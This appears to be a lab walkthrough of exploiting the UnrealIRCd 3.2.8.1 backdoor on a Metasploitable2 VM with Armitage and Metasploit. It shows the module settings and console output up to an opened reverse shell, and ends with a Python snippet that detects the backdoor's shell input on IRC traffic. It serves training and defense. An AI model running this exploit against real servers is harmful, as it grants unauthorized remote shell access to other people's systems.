Armitage (UnrealIRCd backdoor)

This time the test is carried out with Armitage, the GUI front end for Metasploit.

Armitage - Cyber Attack Management for Metasploit

  • Start the database used by Metasploit
  • Initialize the database
  • Start Armitage
root@kali:~# service postgresql restart
root@kali:~# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@kali:~# armitage
[*] Starting msfrpcd for you.
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by sleep.engine.atoms.ObjectAccess (file:/usr/share/armitage/armitage.jar) to method java.lang.ProcessImpl.getErrorStream()
WARNING: Please consider reporting this to the maintainers of sleep.engine.atoms.ObjectAccess
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
[*] MSGRPC starting on (NO SSL):Msg...
[*] Used the tab method:
[*] Warning: @(armitage.ConsoleQueue@388d3b70, 'x', '[-] Connection already established. Only one connection is allowed at a time.
[-] Run db_disconnect first if you wish to connect to a different data service.

Current connection information:
[*] Connected to msf. Connection type: postgresql.
') at
[*] Starting Cortana on
[*] Creating a default reverse handler...
[*] MSGRPC ready at 2019-09-08 01:38:21 +0900.
[*] Remote Exploits Synced
If the message "Could not determine attack computer IP What is it?" appears at this point, Armitage has failed to work out its own IP address, so enter the IP address of the Kali Linux machine (not the target's).

Also, if no attack has been run yet and the target PC is not shown, register the target from the menu bar via [Hosts] → [Add Hosts...] (for example, Metasploitable2's ). Then right-click the registered host and set [Host] → [Operating System] → [Linux].


Next, in the tree on the left, select [exploit] → [unix] → [irc] and double-click [unreal_ircd_3281_backdoor].
The Attack dialog opens; enter the target's IP address in RHOST and click "Launch".
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET 0
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LPORT 6217
LPORT => 6217
[-] The value specified for PAYLOAD is not valid.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6667
RPORT => 6667
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 
[*] - Connected to
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VXh8feb0lckv3svM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VXh8feb0lckv3svM\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2019-09-08 02:40:04 +0900

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) >

Right-click the target and choose [Shell 1] → [Interact].


In the console, enter the command uname -a.

The output shows that we have obtained a shell on Metasploitable2.
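As an added, defender-side example (not part of the original post): the Metasploit log above shows a shell command (`echo VXh8feb0lckv3svM;`) being written to the IRC port while the connection is still in the pre-registration "NOTICE AUTH" phase. The Python below checks client-to-server lines from an IRC sensor feed and flags anything that is not an IRC protocol command; the sample lines are constructed, and the command set is an assumption based on RFC 2812 plus common extensions.

```python
import re

# Constructed sample of client->server lines on the IRC port (6667 in the
# walkthrough). The "echo <16 alnum>;" line mirrors the command shown in the
# Metasploit session log on this page; the rest is made up for illustration.
SAMPLE_CLIENT_LINES = [
    "NICK alice",
    "USER alice 0 * :Alice",
    "CAP LS 302",
    "JOIN #ops",
    "PRIVMSG #ops :echo is a shell builtin; nothing to see",
    "echo VXh8feb0lckv3svM;",
    "PING :server",
]

# Client commands a legitimate IRC client sends (RFC 2812 plus common
# extensions); assumed list, extend for the server you actually run.
KNOWN_IRC_COMMANDS = {
    "PASS", "NICK", "USER", "CAP", "PING", "PONG", "QUIT", "JOIN", "PART",
    "PRIVMSG", "NOTICE", "MODE", "WHO", "WHOIS", "LIST", "NAMES", "TOPIC",
    "AWAY", "OPER", "KICK", "INVITE", "MOTD", "LUSERS", "VERSION", "USERHOST",
}

# Metasploit's double handler verifies the shell by echoing a random 16-char
# token; the same shape appears in the log above ("echo VXh8feb0lckv3svM;").
ECHO_MARKER = re.compile(r"\becho\s+[A-Za-z0-9]{16};")


def irc_command(line):
    """Return the command token of a client line (optional prefix stripped)."""
    parts = line.split()
    if parts and parts[0].startswith(":"):
        parts = parts[1:]
    return parts[0].upper() if parts else ""


def classify(line):
    """Return an alert reason if the line looks like shell input on the IRC
    port rather than IRC protocol, or None if it looks like normal IRC."""
    cmd = irc_command(line)
    if cmd in KNOWN_IRC_COMMANDS:
        return None  # chat text containing "echo" is not shell input
    if ECHO_MARKER.search(line):
        return "echo-token marker outside a valid IRC command"
    return f"unknown IRC command token {cmd!r}"


def suspicious_lines(lines):
    """Return (line, reason) pairs for client lines that warrant an alert."""
    return [(l, classify(l)) for l in lines if classify(l) is not None]
```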